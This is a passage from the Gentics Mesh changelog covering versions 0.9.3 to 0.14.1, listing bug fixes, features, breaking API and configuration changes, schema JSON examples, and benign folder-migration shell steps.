language information is given.\n\n[[v0.14.1]]\n== 0.14.1 (19.01.2018)\n\nicon:check[] Core: Fixed a deadlock situation which could occur when handling more than 20 image resize requests in parallel. Image resize operations will now utilize a dedicated thread pool.\n\nicon:check[] Core: Fixed a bug which caused permission inconsistencies when deleting a group from the system.\n\nicon:plus[] REST: Added support to automatically handle the `Expect: 100-Continue` header. We however recommend to only use this header for upload requests.\nUsing this header will otherwise reduce the response times of your requests. Note that PHP curl will add this header by default.\nYou can read more about the link:https:\/\/support.urbanairship.com\/hc\/en-us\/articles\/213492003--Expect-100-Continue-Issues-and-Risks[header here].\n\n[[v0.14.0]]\n== 0.14.0 (16.01.2018)\n\nCAUTION: The image manipulation query parameters `cropx`, `cropy`, `croph` and `cropw` have been replaced by the `rect` parameter. The `rect` parameter contains the needed values `rect=x,y,w,h`.\n\nCAUTION: The image manipulation query parameter `width` was renamed to `w`. The parameter `height` was renamed to `h`.\n\nCAUTION: The binary transformation request request was updated. The crop parameters are now nested within the `cropRect` object.\n\nCAUTION: It is now required to specify the crop mode when cropping an image. Possible crop modes are `rect` which will utilize the specified crop area or `fp` which will utilize the focal point information in order to crop the image.\n\nicon:plus[] Image: It is now possible to specify a focal point within the binary field of an image.\n This focal point can be used to automatically crop the image in a way so that the focused area is kept in the image.\n The focal point can also be manually specified when requesting an image.\n This will overrule any previously stored focal point information within the binary field.\n\nicon:plus[] UI: The admin UI has been updated to use the renamed image parameters.\n\n[[v0.13.3]]\n== 0.13.3 (12.01.2018)\n\nicon:check[] Core: Optimized concurrency when handling binary data streams (e.g: downloading, image resizing)\n\nicon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n[[v0.13.2]]\n== 0.13.2 (11.01.2018)\n\nicon:plus[] Java Rest Client: It is now possible to retrieve the client version via `MeshRestClient.getPlainVersion()`.\n\nicon:check[] Core: The consistency checks have been enhanced.\n\nicon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n[[v0.13.1]]\n== 0.13.1 (05.01.2018)\n\nicon:check[] Core: A Vert.x bug has been patched which caused HTTP requests to fail which had the \"Connection: close\" header set.\n\nicon:check[] REST: A concurrency issue has been addressed which only happens when deleting and creating projects in fast succession.\n\nicon:check[] Core: A potential concurrency issue has been fixed when handling request parameters.\n\n[[v0.13.0]]\n== 0.13.0 (02.01.2018)\n\nCAUTION: The Java REST client was updated to use RxJava 2.\n\nicon:plus[] Core: The internal RxJava code has been migrated to version 2.\n\n[[v0.12.0]]\n== 0.12.0 (21.12.2017)\n\nCAUTION: The `search.httpEnabled` option within the `mesh.yml` has been removed. The embedded elasticsearch API can no longer be directly accessed via HTTP. The existing endpoint `{apiLatest}\/:projectName\/search` is unaffected by this change.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.0\n\nicon:plus[] Core: The internal server routing system has been overhauled.\n\n== 0.11.8 (18.12.2017)\n\nicon:check[] Image: Fixed a bug which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n== 0.11.7 (17.12.2017)\n\nicon:check[] UI: Fixed an issue where the name in the explorer content list in always shown in English. link:https:\/\/github.com\/gentics\/mesh\/issues\/23[#23]\n\nicon:check[] Storage: Binary field deletion has been made more resilient and will no longer fail if the referenced binary data is not stored within used binary storage. link:https:\/\/github.com\/gentics\/mesh\/issues\/235[#235]\n\nicon:plus[] REST: The `hostname` and `ssl` properties have been added to the project create request. This information will be directly added to the initial release of the project. The properties can thus be changed by updating the project.\n\nicon:plus[] REST: The link resolver mechanism was enhanced to also consider the `hostname` and `ssl` flag of the release of the node which is linked.\n The link resolver will make use of these properties as soon as mesh links point to nodes of foreign projects.\n You can read more on this topic in the link:{{< relref \"features.asciidoc\" >}}#crossdomainlinks[cross domain link section] of our documentation.\n\n== 0.11.6 (15.12.2017)\n\nicon:plus[] Search: The automatic recreation of the search index will now also occur if an empty search index folder was found.\n\nicon:check[] UI: Nodes are now always reloaded when the edit button is clicked in the explorer content list. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/16[#16]\n\nicon:check[] UI: Fixed an issue that was causing a click on a node in the explorer list to open it like a container, even if it is not a container.\n\nicon:check[] UI: Dropdowns for required string fields with the allowed attribute now properly require a value to be set in order to save the node.\n\nicon:check[] UI: Fixed a issue where contents of a micronode were not validated before saving a node.\n\nicon:check[] Core: Reduce the memory load of the ChangeNumberStringsToNumber-changelog by reducing the size of a single transactions.\n\nicon:check[] Image: Image handling has been optimized. Previously resizing larger images could temporarily lock up the http server.\n\n== 0.11.5 (14.12.2017)\n\nicon:plus[] UI: Add multi binary upload dialogue. Users can now upload multiple files at once by clicking the button next to the create node button.\n\nicon:plus[] UI: Binary fields can now be used as display fields. The filename is used as the display name for the node. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/11[#11]\n\nicon:plus[] UI: It is now possible to specify the URL to the front end of a system. This allows users to quickly go to the page that represents the node in the system.\n See the default `mesh-ui-config.js` or the link:{{< relref \"user-interface.asciidoc\" >}}#_configuration[online documentation] for more details. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/14[#14]\n\nicon:plus[] Upload: The upload handling code has been refactored in order to process the uploaded data in-parallel.\n\nicon:plus[] Storage: The binary storage mechanism has been overhauled in preparation for Amazon S3 \/ link:https:\/\/minio.io\/[Minio] support.\n The data within the local binary storage folder and all binary fields will automatically be migrated.\n The created `binaryFilesMigrationBackup` folder must be manually removed once the migration has finished.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.31\n\nicon:plus[] Core: Binary fields can now be chosen as display fields. The value of the display field is the filename of the binary.\n\nicon:plus[] REST: The display name has been added to the node response. It can be found in the key `displayName`.\n\nicon:plus[] GraphQL: The display name can now be fetched from a node via the `displayName` field.\n\nicon:check[] UI: Nodes in the \"Select Node...\" dialogue are now sorted by their display name. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/15[#15]\n\nicon:check[] UI: The \"Select Node...\" dialogue now remembers the last position it was opened. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/12[#12]\n\nicon:check[] UI: The dropdown for list types in the schema editor now only shows valid list types.\n\nicon:check[] UI: Fixed a bug that causes image preview to disappear after saving a node. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/18[#18]\n\nicon:check[] Core: A bug has been fixed which prevented node updates. The issue occurred once a node was updated from which a language variant was previously deleted.\n\nicon:check[] Search: The search index will now automatically be recreated if the search index folder could not be found.\n\nicon:check[] Core: The values of number-fields where stored as strings in the database which caused issues when converting numbers to and from string.\n This has been fixed: the values of number-fields will now be stored as numbers.\n\nicon:check[] Schema: The schema deletion process will now also include all schema versions, referenced changes and jobs.\n\nicon:check[] Clustering: A NPE which could occur during initial setup of a clustered instance has been fixed.\n\n== 0.11.4 (07.12.2017)\n\nicon:check[] Core: Fixed various errors which could occur when loading a node for which the editor or creator user has been previously deleted.\n\n== 0.11.3 (30.11.2017)\n\nicon:plus[] Core: Various performance enhancements have been made to increase the concurrency handling and to lower the request times.\n\nicon:plus[] Websocket: It is now possible to register to a larger set of internal events.\n A full list of all events is documented within the link:{{< relref \"features.asciidoc\" >}}#_eventbus_bridge_websocket[eventbus bridge \/ websocket documentation].\n\nicon:plus[] Config: The eventloop and worker pool size can now be configured within the `mesh.yml` file.\n\nicon:plus[] Logging: The logging verbosity was reduced.\n\nicon:plus[] GraphQL: It is now possible to load a list of all languages of a node via the added `.languages` field.\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 6.0\n\nicon:check[] Core: Fixed a bug which prevented uploading multiple binaries to the same node.\n\nicon:check[] UI: Fixed error message handling for failed save requests.\n\nicon:check[] UI: Fixed the dropdown positioning in IE within the node edit area.\n\nicon:check[] Memory: The memory usage for micronode migrations has been improved.\n\n== 0.11.2 (21.11.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.30\n\nicon:check[] Core: Fixed a bug which caused unusual high CPU usage. link:https:\/\/github.com\/gentics\/mesh\/issues\/201[#201]\n\n== 0.11.1 (13.11.2017)\n\nicon:plus[] Elasticsearch: Add support for inline queries.\n\nicon:check[] Elasticsearch: In some cases the connection to Elasticsearch was not directly ready during start up. This caused various issues. A start-up check has been added in order to prevent this.\n\nicon:check[] Schema: A bug within the schema update mechanism which removed the urlField property value has been fixed.\n\nicon:check[] Elasticsearch: A deadlock situation which could occur during schema validation was fixed.\n\n== 0.11.0 (11.11.2017)\n\nCAUTION: GraphQL: The root field `releases` has been removed. The root field `release` now takes no parameters and loads the active release.\n\nCAUTION: Elasticsearch: Search queries will now automatically be wrapped in a boolean query in order to check permissions much more efficiently.\n\nCAUTION: The schema field property `searchIndex` \/ `searchIndex.addRaw` has been removed. The property was replaced by a mapping definition which can be added to each field.\n All schemas will automatically be migrated to the new format. Please keep in mind to also update any existing schema files which you may have stored externally.\n\n```json\n{\n \"name\": \"dummySchema\",\n \"displayField\": \"name\",\n \"fields\": [\n {\n \"name\": \"name\",\n \"label\": \"Name\",\n \"required\": true,\n \"type\": \"string\",\n \"elasticsearch\": {\n \"raw\": {\n \"index\": \"not_analyzed\",\n \"type\": \"string\"\n }\n }\n }\n ]\n}\n```\n\nicon:plus[] Schema: It is now possible to configure index settings and custom search index field mappings within the schema.\n\nThe index settings can be used to define new link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis-analyzers.html[analyzers] and link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis-tokenizers.html[tokenizer] or other additional link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/guide\/current\/_index_settings.html[index settings].\nThe specified settings will automatically be merged with a default set of settings.\n\nOnce a new analyzer has been defined it can be referenced by custom field mappings which can now be added to each field.\nThe specified field mapping will be added to the generated fields property of the mapping. You can read more about this topic in the link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/multi-fields.html[fields mapping documentation] of Elasticsearch.\n\n```json\n{\n \"name\": \"dummySchema\",\n \"displayField\": \"name\",\n \"elasticsearch\": {\n \"settings\": {\n \"number_of_shards\" : 1,\n \"number_of_replicas\" : 0\n },\n \"analysis\" : {\n \"analyzer\" : {\n \"suggest\" : {\n \"tokenizer\" : \"mesh_default_ngram_tokenizer\",\n \"char_filter\" : [ \"html_strip\" ],\n \"filter\" : [ \"lowercase\" ]\n }\n }\n }\n },\n \"fields\": [\n {\n \"name\": \"name\",\n \"label\": \"Name\",\n \"required\": true,\n \"type\": \"string\",\n \"elasticsearch\": {\n \"suggest\": {\n \"analyzer\": \"suggest\",\n \"type\": \"string\"\n }\n }\n }\n ]\n}\n```\n\nYou can use the `POST {apiLatest}\/utilities\/validateSchema` endpoint to validate and inspect the effective index configuration.\n\nicon:plus[] REST: The `POST {apiLatest}\/utilities\/validateSchema` and `POST {apiLatest}\/utilities\/validateMicroschema` endpoints can now be used to validate a schema\/microschema JSON without actually storing it.\n The validation response will also contain the generated Elasticsearch index configuration.\n\nicon:plus[] GraphQL: Nodes can now be loaded in the context of a schema. This will return all nodes which use the schema.\n\nicon:plus[] Search: The `{apiLatest}\/rawSearch\/..` and `{apiLatest}\/:projectName\/rawSearch\/..` endpoints have been added. These can be used to invoke search requests which will return the raw elasticsearch response JSON.\n The needed indices will automatically be selected in order to only return the type specific documents. Read permissions on the document will also be automatically checked.\n\nicon:plus[] Search: Error information for failed Elasticsearch queries will now be added to the response.\n\nicon:plus[] Webroot: The schema property `urlFields` can now used to specify fields which contain webroot paths.\n The webroot endpoint in turn will first try to find a node which specified the requested path.\n If no path could be found using the urlField values the regular segment path will be used to locate the node.\n This feature can be used to set custom urls or short urls for your nodes.\n\nicon:check[] Performance: Optimized binary download memory usage.\n\nicon:check[] REST: Fixed a bug which prevented pages with more than 2000 items from being loaded.\n\n== 0.10.4 (10.10.2017)\n\nCAUTION: REST: The `availableLanguages` field now also contains the publish information of the languages of a node.\n\nicon:check[] REST: Fixed a bug in the permission system. Permissions on microschemas will now correctly be updated when applying permission recursively on projects.\n\nicon:check[] REST: ETags will now be updated if the permission on the element changes.\n\nicon:check[] Core: Various bugs within the schema \/ microschema migration code have been addressed and fixed.\n\nicon:check[] Core: The search index handling has been updated. A differential synchronization will be run to update the new search index and thus the old index data can still be used.\n\nicon:check[] Performance: Removing permissions has been optimized.\n\nicon:plus[] UI: A new action was added to the node action context menu. It is now possible to unpublish nodes.\n\nicon:plus[] UI: The Mesh UI was updated.\n\nicon:plus[] Config: It is now possible to configure the host to which the Gentics Mesh http server should bind to via the `httpServer.host` setting in the `mesh.yml` file. Default is still 0.0.0.0 (all interfaces).\n\nicon:plus[] REST: The `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateSchemas` and `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateMicroschemas` endpoints have been changed from `GET` to `POST`.\n\nicon:plus[] REST: The `{apiLatest}\/admin\/reindex` and `{apiLatest}\/admin\/createMappings` endpoints have been changed from `GET` to `POST`.\n\nicon:plus[] CLI: It is now possible to reset the admin password using the `-resetAdminPassword` command line argument.\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 5.0\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.29\n\n== 0.10.3 (18.09.2017)\n\nicon:plus[] Logging: The `logback.xml` default logging configuration file will now be placed in the `config` folder. The file can be used to customize the logging configuration.\n\nicon:plus[] Configuration: It is now possible to set custom properties within the elasticsearch setting.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.27\n\nicon:plus[] REST: It is now possible to set and read permissions using paths which contain the project name. Example: `GET {apiLatest}\/roles\/:roleUuid\/permissions\/:projectName\/...`\n\nicon:check[] Search: A potential race condition has been fixed. This condition previously caused the elasticsearch to no longer accept any changes.\n\nicon:check[] Performance: The REST API performance has been improved by optimizing the JSON generation process. link:https:\/\/github.com\/gentics\/mesh\/issues\/141[#141]\n\n== 0.10.2 (14.09.2017)\n\nicon:book[] Documentation: The new link:{{< relref \"security.asciidoc\" >}}[security] and link:{{< relref \"performance.asciidoc\" >}}[performance] sections have been added to our documentation.\n\nicon:plus[] The *Webroot-Response-Type* header can now be used to differentiate between a webroot binary and node responses. The values of this header can either be *binary* or *node*.\n\nicon:plus[] The `{apiLatest}\/admin\/status\/migrations` endpoint was removed.\n The status of a migration job can now be obtained via the `{apiLatest}\/admin\/jobs` endpoint. Successfully executed jobs will no longer be removed from the job list.\n\nicon:plus[] The `{apiLatest}\/:projectName\/release\/:releaseUuid\/schemas` and `{apiLatest}\/:projectName\/release\/:releaseUuid\/microschemas` endpoint has been reworked.\n The response format has been updated. The status and uuid of the job which has been invoked when the migration was started will now also be included in this response.\n\nicon:check[] Java REST Client: A potential threading issue within the Java REST Client has been fixed. Vert.x http clients will no longer be shared across multiple threads.\n\nicon:check[] Memory: Reduce memory footprint of microschema migrations. link:https:\/\/github.com\/gentics\/mesh\/issues\/135[#135]\n\nicon:check[] Fixed handling \"required\" and \"allow\" properties of schema fields when adding fields to schemas.\n\n== 0.10.1 (08.09.2017)\n\nicon:plus[] Clustering: Added link:{{< relref \"clustering.asciidoc\" >}}#_node_discovery[documentation] and support for cluster configurations which use a list of static IP adresses instead of multicast discovery.\n\nicon:plus[] Node Migration: The node migration performance has been increased.\n\nicon:plus[] REST: Added new endpoints `{apiLatest}\/admin\/jobs` to list and check queued migration jobs. The new endpoints are described in the link:{{< relref \"features.asciidoc\" >}}#_executing_migrations[feature documentation].\n\nicon:check[] Search: The `raw` field will no longer be added by default to the search index. Instead it can be added using the new `searchIndex.addRaw` flag within the schema field.\n Please note that the raw field value in the search index will be automatically truncated to a size of 32KB. Otherwise the value can't be added to search index.\n\nicon:check[] Migration: Interrupted migrations will now automatically be started again after the server has been started. Failed migration jobs can be purged or reset via the `{apiLatest}\/admin\/jobs` endpoint.\n\nicon:check[] Migration: Migrations will no longer fail if a required field was added. The field will be created and no value will be set. Custom migration scripts can still be used to add a custom default value during migration.\n\n[source,json]\n----\n{\n \"name\" : \"name\",\n \"label\" : \"Name\",\n \"required\" : true,\n \"type\" : \"string\",\n \"searchIndex\": {\n \"addRaw\": true\n }\n}\n----\n\nicon:check[] Java REST Client: Various missing request parameter implementations have been added to the mesh-rest-client module.\n\nicon:check[] Node Migration: A bug has been fixed which prevented node migrations with more than 5000 elements from completing.\n\nicon:check[] GraphQL: Updated GraphiQL browser to latest version to fix various issues when using aliases.\n\n== 0.10.0 (04.09.2017)\n\n\nCAUTION: Manual Change: Configuration changes. For already existing `mesh.yml` files, the `nodeName` setting has to be added. Choose any name for the mesh instance.\n\nCAUTION: Manual Change: Configuration changes. The `clusterMode` setting has been deprecated in favour of the new cluster configuration. This setting must be removed from the `mesh.yml` file.\n\n[CAUTION]\n=====================================================================\nManual Change: The configuration files `mesh.yml`, `keystore.jceks` must be moved to a subfolder `config` folder.\n\n[source,bash]\n----\nmkdir config\nmv mesh.yml config\nmv keystore.jceks config\n----\n=====================================================================\n\n[CAUTION]\n=====================================================================\nManual Change: The graph database folder needs to be moved. Please create the `storage` subfolder and move the existing data into that folder.\n\n[source,bash]\n----\nmkdir -p data\/graphdb\/storage\nmv data\/graphdb\/* data\/graphdb\/storage\/\n----\n=====================================================================\n\nicon:plus[] Clustering: This release introduces the master-master clustering support. You can read more about clustering and the configuration in the link:{{< relref \"clustering.asciidoc\" >}}[clustering documentation].\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.26\n\nicon:plus[] REST: The `{apiLatest}\/admin\/consistency\/check` endpoint has been added. The endpoint can be used to verify the database integrity.\n\nicon:check[] Core: Fixed missing OrientDB roles and users for some older graph databases. Some graph databases did not create the needed OrientDB user and roles. These roles and users are needed for the OrientDB server and are different from Gentics Mesh users and roles.\n\nicon:check[] REST: Invalid date strings were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\nicon:check[] REST: The delete handling has been updated.\n It is now possible to specify the `?recursive=true` parameter to recursively delete nodes.\n By default `?recursive=false` will be used. Deleting a node which contains children will thus cause an error.\n The behaviour of node language deletion has been updated as well. Deleting the last language of a node will also remove this node. This removal will again fail if no `?recursive=true` query parameter has been added.\n\n== 0.9.28 (28.08.2017)\n\nicon:check[] Core: The permission check system has been updated. The elements which have only `readPublished` permission can now also be read if the user has only `read` permission. The `read` permission automatically also grants `readPublished`.\n\nicon:check[] Java REST Client: The classes `NodeResponse` and `MicronodeField` now correctly implement the interface `FieldContainer`.\n\nicon:check[] REST: The endpoint `{apiLatest}\/{projectName}\/nodes\/{nodeUuid}\/binary\/{fieldName}` did not correctly handle the read published nodes permission. This has been fixed now. link:https:\/\/github.com\/gentics\/mesh\/issues\/111[#111]\n\n== 0.9.27 (23.08.2017)\n\nicon:plus[] GraphQL: It is now possible to retrieve the unfiltered result count. This count is directly loaded from the search provider and may not match up with the exact filtered count.\n The advantage of this value is that it can be retrieved very fast.\n\nicon:plus[] Java REST Client: The client now also supports encrypted connections.\n\nicon:check[] REST: Invalid date were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\nicon:check[] GraphQL: Various errors which occurred when loading a schema of a node via GraphQL have been fixed now.\n\n== 0.9.26 (10.08.2017)\n\nicon:plus[] UI: Added CORS support. Previously CORS was not supported by the UI.\n\nicon:check[] REST API: Added a missing allowed CORS headers which were needed to use the Gentics Mesh UI in a CORS environment.\n\nicon:check[] UI: Fixed translation action. Previously a error prevented translations from being executed.\n\nicon:check[] UI: Fixed image handling for binary fields. Previously only the default language image was displayed in the edit view. This has been fixed.\n\n== 0.9.25 (09.08.2017)\n\nicon:plus[] Demo: The demo dump extraction will now also work if an empty data exists. This is useful when providing a docker mount for the demo data.\n\nicon:plus[] GraphQL: The paging performance has been improved.\n\nicon:plus[] Core: Various missing permission checks have been added.\n\nicon:check[] Core: A bug in the schema changes apply code has been fixed. The bug previously prevented schema changes from being applied.\n\n== 0.9.24 (03.08.2017)\n\nicon:plus[] REST API: Added idempotency checks for various endpoints to prevent execution of superfluous operations. (E.g: Assign role to group, Assign schema to project)\n\nicon:check[] Core: Fixed a bug which prevented micronodes from being transformed. SUP-4751\n\n== 0.9.23 (02.08.2017)\n\nicon:plus[] Rest-Client: It is now possible to configure the base uri for the rest client.\n\nicon:plus[] GraphQL: It is now possible to get the reference of all projects from schemas and microschemas.\n\nicon:check[] UI: Date fields now work with ISO 8601 strings rather than Unix timestamps.\n\nicon:check[] UI: Fixed bugs with lists of microschemas. (SUP-4712)\n\nicon:check[] UI: Fixed mouse clicks not working in lists in FF and (partially) in IE\/Edge. (SUP-4717)\n\nicon:check[] Core: The reindex performance has been increased and additional log output will be provided during operations actions.\n\n== 0.9.22 (28.07.2017)\n\nicon:plus[] REST API: It is now possible to create nodes, users, groups, roles, releases and projects using a provided uuid.\n\nicon:check[] Versioning: A publish error which was caused due to a bug in the node language deletion code has been fixed.\n\n== 0.9.21 (26.07.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.24\n\nicon:check[] Core: Fixed handling of ISO8601 dates which did not contain UTC flag or time offset value. Such dates could previously not be stored. Note that ISO8601 UTC dates will always be returned.\n\nicon:check[] GraphQL: URL handling of the GraphQL browser has been improved. Previously very long queries lead to very long query parameters which could not be handled correctly. The query browser will now use the anchor part of the URL to store the query.\n\nicon:check[] Migration: The error handling within the schema migration code has been improved.\n\nicon:plus[] GraphQL: It is now possible to load the schema version of a node using the ```schema``` field.\n\nicon:check[] Versioning: Older Gentics Mesh instances (>0.8.x) were lacking some draft information. This information has been added now.\n\n== 0.9.20 (21.07.2017)\n\nicon:plus[] License: The license was changed to Apache License 2.0\n\nicon:plus[] Schema Versions: The schema version field type was changed from `number` to `string`. It is now also possible to load schema and microschema versions using the `?version` query parameter.\n\nicon:check[] Search: The error reporting for failing queries has been improved.\n\nicon:check[] Search: The total page count value has been fixed for queries which were using `?perPage=0`.\n\n== 0.9.19 (07.07.2017)\n\nicon:check[] UI: Fixed adding node to node list.\n\nicon:check[] Docs: Various endpoints were not included in the generated RAML. This has been fixed now.\n\n== 0.9.18 (30.06.2017)\n\nicon:plus[] Demo: Fixed demo data uuids.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.22\n\nicon:plus[] Core: The Ferma OGM library was updated to version 2.2.2\n\n== 0.9.17 (21.06.2017)\n\nicon:check[] UI: A bug which prevented micronodes which contained empty node field from being saved was fixed.\n\nicon:check[] Core: Issues within the error reporting mechanism have been fixed.\n\nicon:plus[] Server: The Mesh UI was added to the mesh-server jar.\n\nicon:plus[] Core: The internal transaction handling has been refactored.\n\nicon:plus[] Core: The Vert.x core dependency was updated to version 3.4.2\n\nicon:plus[] API: The version field of node responses and publish status responses are now strings instead of objects containing the version number.\n\n== 0.9.16 (19.06.2017)\n\nicon:book[] Documentation: Huge documentation update.\n\n== 0.9.15 (19.06.2017)\n\nicon:check[] GraphQL: Fixed loading tags for nodes.\n\n== 0.9.14 (09.06.2017)\n\nicon:check[] WebRoot: Bugs within the permission handling have been fixed. It is now possible to load nodes using only the *read_published* permission. This permission was previously ignored.\n\nicon:check[] GraphQL: An introspection bug which prevented graphiql browser auto completion from working correctly has been fixed. The bug did not occur on systems which already used microschemas.\n\n== 0.9.13 (08.06.2017)\n\nicon:check[] UI: The UI was updated. An file upload related bug was fixed.\n\nicon:check[] UI: Schema & Microschema description is no longer a required field.\n\n== 0.9.12 (08.06.2017)\n\nicon:check[] GraphQL: Fixed handling of node lists within micronodes.\n\nicon:check[] GraphQL: Fixed Micronode type not found error.\n\nicon:check[] GraphQL: Fixed GraphQL API for system which do not contain any microschemas.\n\nicon:check[] GraphQL: Fixed permission handling and filtering when dealing with node children.\n\n== 0.9.11 (07.06.2017)\n\nicon:plus[] GraphQL: The GraphQL library was updated. Various GraphQL related issues have been fixed.\n\n== 0.9.10 (29.05.2017)\n\nicon:plus[] Schemas: The default content and folder schemas have been updated. The `fileName` and `folderName` fields have been renamed to `slug`. The `name` field was removed from the content schema and a `teaser` field has been added.\nThese changes are optional and thus not automatically applied to existing installations.\n\nicon:plus[] Demo: The `folderName` and `fileName` fields have been renamed to `slug`. This change only affects new demo installations.\n\n\nicon:check[] GraphQL: The language fallback handling was overhauled. The default language will no longer be automatically be append to the list of fallback languages. This means that loading nodes will only return nodes in those languages which have been specified by the `lang` argument.\n\nicon:check[] GraphQL: The `path` handling for nodes within node lists has been fixed. Previously it was not possible to retrieve the `path` and various other fields for those nodes.\n\n== 0.9.9 (19.05.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.20.\n\nicon:plus[] API: The following endpoints were moved:\n\n * `{apiLatest}\/admin\/backup` \u27f6 `{apiLatest}\/admin\/graphdb\/backup`\n * `{apiLatest}\/admin\/export` \u27f6 `{apiLatest}\/admin\/graphdb\/export`\n * `{apiLatest}\/admin\/import` \u27f6 `{apiLatest}\/admin\/graphdb\/import`\n * `{apiLatest}\/admin\/restore` \u27f6 `{apiLatest}\/admin\/graphdb\/restore`\n\nicon:plus[] Core: Added `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateMicroschemas` endpoint which can be used to resume previously unfinished micronode migrations.\n\nicon:plus[] Performance: The startup performance has been increased when dealing with huge datasets.\n\nicon:plus[] Auth: The anonymous authentication mechanism can now also be disabled by setting the `Anonymous-Authentication: disable` header. This is useful for client applications which don't need or want anonymous authentication. The Gentics Mesh REST client has been enhanced accordingly.\n\nicon:plus[] Core: The read performance of node lists has been improved.\n\nicon:plus[] Core: The write performance of nodes has been improved.\n\nicon:plus[] Demo: The demo data have been updated. The a folderName and fileName field has been added to the demo schemas.\n\nicon:plus[] GraphQL: Added micronode list handling. Previously it was not possible to handle micronode list fields.\n\nicon:check[] Core: Fixed NPE that was thrown when loading releases on older systems.\n\nicon:check[] Core: An upgrade error has been fixed which was caused by an invalid microschema JSON format error.\n\nicon:check[] UI: You will no longer be automatically logged in as anonymous user once your session expires.\n\nicon:check[] Core: The language fallback handling for node breadcrumbs has been fixed. Previously the default language was not automatically added to the handled languages.\n\n== 0.9.8 (08.05.2017)\n\nicon:plus[] UI: Microschemas can now be assigned to projects.\n\nicon:plus[] UI: Descriptions can now be assigned to schemas & microschemas.\n\nicon:plus[] Core: A bug was fixed which prevented the node response `project` property to be populated.\n\nicon:plus[] Core: The redundant `isContainer` field was removed from the node response.\n\nicon:plus[] Core: Various bugs for node migrations have been fixed.\n\nicon:plus[] Core: The allow property for micronode schema fields will now correctly be handled.\n\nicon:plus[] Core: Microschemas will now be assigned to projects during a schema update. This only applies for microschemas which are referenced by the schema (e.g. via a micronode field).\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.19.\n\n== 0.9.7 (28.04.2017)\n\nicon:plus[] GraphQL: The nested `content` and `contents` fields have been removed. The properties of those fields have been merged with the `node` \/ `nodes` field.\n\nicon:plus[] GraphQL: The field names for paged resultset meta data have been updated to better match up with the REST API fields.\n\nicon:plus[] GraphQL: A language can now be specified when loading node reference fields using the `lang` argument.\n\nicon:plus[] GraphQL: It is now possible to resolve links within loaded fields using the `linkType` field argument.\n\nicon:plus[] Auth: Support for anonymous access has been added to mesh. Requests which do not provide a `mesh.token` will automatically try to use the `anonymous` user. This user is identified by `username` and the thus no anonymous access support is provided if the user can't be located.\n\nicon:plus[] GraphQL: It is now possible to retrieve the path for a content using the `path` field. The `Node.languagePaths` has been removed in favour of this new field.\n\nicon:plus[] Auth: It is now possible to issue API tokens via the `GET {apiLatest}\/users\/:userUuid\/token` endpoint. API tokens do not expire and work in conjunction with the regular JWT authentication mechanism. These tokens should only be used when SSL is enabled. The `DELETE {apiLatest}\/users\/:userUuid\/token` endpoint can be used to revoke the issued API token. Only one API token is supported for one user. Generating a new API token will invalidate the previously issued token.\n\nicon:check[] GraphQL: An error was fixed which occurred when loading a node using a bogus uuid.\n\nicon:check[] Auth: An error which caused the keystore loading process to fail was fixed.\n\n== 0.9.6 (14.04.2017)\n\nicon:plus[] It is now possible to resume previously aborted schema migrations via the `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateSchemas` endpoint.\n\nicon:plus[] Auth: The Java keystore file will now automatically be created if none could be found. The keystore password will be taken from the `mesh.yml` file or randomly generated and stored in the config.\n\nicon:check[] Core: Migration errors will no longer cause a migration to be aborted. The migration will continue and log the errors. An incomplete migration can be resumed later on.\n\nicon:check[] Core: Fixed node migration search index handling. Previous migrations did not correctly update the index. A automatic reindex will be invoked during startup.\n\n== 0.9.5 (13.04.2017)\n\nicon:check[] Core: The schema check for duplicate field labels has been removed. The check previously caused schema updates to fail.\n\n== 0.9.4 (13.04.2017)\n\nicon:check[] UI: Fixed project creation.\n\nicon:check[] UI: Fixed error when attempting to translate a node.\n\nicon:check[] UI: Fixed incorrect search query.\n\nicon:check[] UI: Display error when attempting to publish a node with an unpublished ancestor\n\nicon:check[] JWT: The `signatureSecret` property within the Gentics Mesh configuration has been renamed to `keystorePassword`.\n\nicon:plus[] JWT: It is now possible to configure the algorithm which is used to sign the JWT tokens.\n\nicon:plus[] Java: The Java model classes have been updated to provide fluent API's.\n\nicon:plus[] Demo: It is now possible to access elasticsearch head UI directly from mesh via http:\/\/localhost:8080\/elastichead - The UI will only be provided if the elasticsearch http ports are enabled. Only enable this for development since mesh will not protect the Elasticsearch HTTP server.\n\nicon:plus[] Core: Downgrade and upgrade checks have been added. It is no longer possible to run Gentics Mesh using a dump which contains data which was touched by a newer mesh version. Upgrading a snapshot version of Gentics Mesh to a release version can be performed under advisement.\n\n== 0.9.3 (10.04.2017)\n\nicon:check[] UI: A bug which prevented assigning created schemas to projects was fixed.\n\nicon:check[] A bug which could lead to concurrent request failing was fixed.\n\nicon:check[] Error handling: A much more verbose error will be returned when creating a schema which lacks the type field for certain schema fields.\n\nicon:check[] GraphQL: A bug which 